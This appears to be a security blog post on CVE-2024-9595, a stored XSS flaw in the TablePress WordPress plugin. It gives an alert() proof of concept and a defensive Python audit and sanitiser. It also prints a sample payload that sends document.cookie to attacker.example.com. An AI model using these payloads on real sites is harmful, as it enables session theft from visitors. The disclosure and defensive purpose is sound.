
## Introduction

A critical vulnerability, tracked as CVE-2024-9595, has been identified in the popular WordPress plugin TablePress (up to version 2.4.2). This flaw lets attackers execute stored Cross-Site Scripting (XSS) by injecting malicious scripts into table cells. This post breaks down what this means, shows how simple the exploit is, and guides you on how to protect your site.

## About TablePress

TablePress is one of the most widely-used plugins for creating dynamic, responsive tables in WordPress. It’s trusted by hundreds of thousands of websites for its flexibility and ease of use. Unfortunately, this popularity makes it a juicy target for attackers.

## The Security Vulnerability

In TablePress versions 2.4.2 and below, anyone with at least Author privileges can insert JavaScript payloads directly into table cell content. The plugin fails to fully sanitize or escape this input, so the script gets saved to the database and is executed in the browser of anyone who visits the page displaying the table.

- The attack is persistent ("stored"): the payload is saved with the table and affects every visitor who views the page.
- An account with the Author role or higher is required; Contributors and Subscribers can't use this exploit by default.

1. The attacker logs in with an account that has Author-level permissions or above.
2. Creates or edits a table using TablePress.
3. Inserts malicious JavaScript into one of the table cells.
4. Publishes or updates the table so the script is stored in the database.
5. Visitors (or admins) who view this table trigger the malicious code within their browser.

This exploit doesn’t require any advanced skills and can be used for a variety of attacks, including stealing session cookies or redirecting users.

## Exploit Chain

- User with correct privileges → Edits TablePress table → Inserts XSS payload → Saves table → XSS fires on victim's browser

## Proof-of-Concept Code

Below is a step-by-step PoC you can try on a test site (never use exploits on live websites or without permission!). Steps 1 and 2 are the same as in the attack flow above: log in with an Author-level account and create or edit a table.

3. In a cell, insert this code:

```html
<script>alert('XSS by CVE-2024-9595')</script>
```

[Screenshot: Example of inserting the payload into a TablePress cell.]

4. Save the table and insert it into any page or post using its shortcode, for example:

```text
[table id=1 /]
```

5. Visit the page on the front end.

Result:
An alert should pop up, showing that the JavaScript executed – this is your stored XSS.

*In a real attack, the script would do something more malicious, such as sending the victim's cookies to a server the attacker controls:*

```html
<script>fetch('https://attacker.example.com/?cookie='+document.cookie);</script>
```

## How to Fix / Protect Your Site

Site owners:

- Update TablePress to the latest patched release; versions 2.4.2 and below are affected.
- Review which accounts hold the Author role or higher, since that is all the attack requires.
- Sanitize and escape user-supplied content, especially if you're a plugin/theme developer.

Visitors:

- Keep your browser and antivirus up to date.
- Be cautious when interacting with unfamiliar sites, especially if you see unexpected JavaScript alerts or redirects.
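To make the "sanitize user input" advice concrete, here is an added example in Python (my own code, not part of the original post or of the TablePress plugin) showing both halves of the defender's job: an audit routine that scans an export of stored tables for script tags, inline event handlers and `javascript:` URLs, and an allowlist sanitiser that keeps harmless formatting (links, bold, italics) while dropping everything that can execute. It assumes, as a simplification not stated in the post, that each table is stored as a JSON array of rows of cell strings; the sample export is constructed for this example and includes the post's own `alert()` payload.

```python
"""Audit stored TablePress-style table data for active content and neutralise it.

Added example; not code from the original post or the TablePress project.
Assumption (not from the post): a table is stored as a JSON array of rows,
each row a list of cell strings. The sample export below is constructed.
"""
import html
import json
import re
from html.parser import HTMLParser

# Audit heuristics. Tables legitimately hold markup such as <b> or <a>, so only
# script tags, event handlers inside a tag and javascript: URLs are flagged.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
EVENT_HANDLER = re.compile(r"<[^>]*\bon[a-z]+\s*=", re.IGNORECASE)
SCRIPT_URL = re.compile(r"<[^>]*\b(?:href|src)\s*=\s*['\"]?\s*javascript:", re.IGNORECASE)


def cell_is_suspicious(cell: str) -> bool:
    """True if the cell carries content that would execute in a visitor's browser."""
    return bool(SCRIPT_TAG.search(cell) or EVENT_HANDLER.search(cell)
                or SCRIPT_URL.search(cell))


def audit_tables(posts):
    """Return (post_id, row, col, cell) for every suspicious cell in an export.

    `posts` is an iterable of (post_id, post_content) pairs, post_content being
    the JSON-encoded rows described in the module docstring.
    """
    findings = []
    for post_id, content in posts:
        for r, row in enumerate(json.loads(content)):
            for c, cell in enumerate(row):
                if isinstance(cell, str) and cell_is_suspicious(cell):
                    findings.append((post_id, r, c, cell))
    return findings


# Sanitiser allowlist: tag -> attributes that may survive. Anything not listed
# is dropped. WordPress core offers wp_kses() for the same job.
ALLOWED_TAGS = {"a": {"href", "title"}, "b": set(), "strong": set(),
                "i": set(), "em": set(), "br": set()}
SAFE_URL = re.compile(r"^(?:https?:|mailto:|/|#)", re.IGNORECASE)


class AllowlistSanitizer(HTMLParser):
    """Rebuilds a cell keeping only allowlisted markup; all text is escaped."""

    def __init__(self):
        super().__init__()          # convert_charrefs=True: entities arrive as text
        self.out = []
        self.open_tags = []         # allowlisted tags still open, for balancing
        self.skip_depth = 0         # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                  # unknown tag dropped; its text is still kept
        kept = []
        for name, value in attrs:
            value = (value or "").strip()
            if name not in ALLOWED_TAGS[tag]:
                continue            # drops every on* handler
            if name == "href" and not SAFE_URL.match(value):
                continue            # drops javascript: and other odd schemes
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag != "br":
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:       # close anything left open inside this tag
            t = self.open_tags.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:     # script/style bodies are discarded entirely
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        self.close()
        while self.open_tags:       # balance tags the author never closed
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_cell(cell: str) -> str:
    """Return the cell with only allowlisted markup left in it."""
    parser = AllowlistSanitizer()
    parser.feed(cell)
    return parser.result()


# Constructed sample export: post 101 is a normal table, post 102 holds the
# post's alert() payload plus a javascript: URL and an event-handler variant.
SAMPLE_POSTS = [
    (101, json.dumps([["Quarter", "Revenue"], ["Q1", "1,200"], ["Q2", "<b>1,450</b>"]])),
    (102, json.dumps([["Name", "Note"],
                      ["a", "<script>alert('XSS by CVE-2024-9595')</script>"],
                      ["b", "<a href=\"javascript:alert(1)\">click</a>"],
                      ["c", "<b onmouseover=\"alert(1)\">hover</b>"]])),
]

if __name__ == "__main__":
    for post_id, r, c, cell in audit_tables(SAMPLE_POSTS):
        print(f"post {post_id} row {r} col {c}: {cell!r} -> {sanitize_cell(cell)!r}")
```

Running the file prints each flagged cell next to its sanitised form; pointing `audit_tables()` at a real export is a matter of feeding it `(post_id, post_content)` pairs. The design choice worth noting is that the sanitiser never tries to recognise "bad" input, only to rebuild output from an allowlist, so a cell like the post's payload collapses to an empty string while ordinary formatting survives intact. In a WordPress plugin the equivalent of `sanitize_cell()` is `wp_kses()` with an explicit allowed-tags array applied on output, which is what keeps a stored payload from ever reaching the visitor's browser.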

## General Recommendations

- Enable security plugins like Wordfence or Sucuri for extra scans.

## References

- NVD Listing for CVE-2024-9595
- Wordfence Advisory on TablePress XSS
- TablePress Plugin Page
- XSS Explained – OWASP

## Summary

CVE-2024-9595 proves even the best-loved plugins can have serious security gaps. Anyone running a WordPress site with TablePress should update immediately. This stored XSS can have serious consequences if left unpatched – but fixing it is as simple as updating the plugin and reviewing user privileges.

*Stay safe, stay updated, and never underestimate WordPress plugin vulnerabilities!*



## Timeline

Published on: 10/12/2024 09:15:03 UTC
Last modified on: 10/15/2024 12:57:46 UTC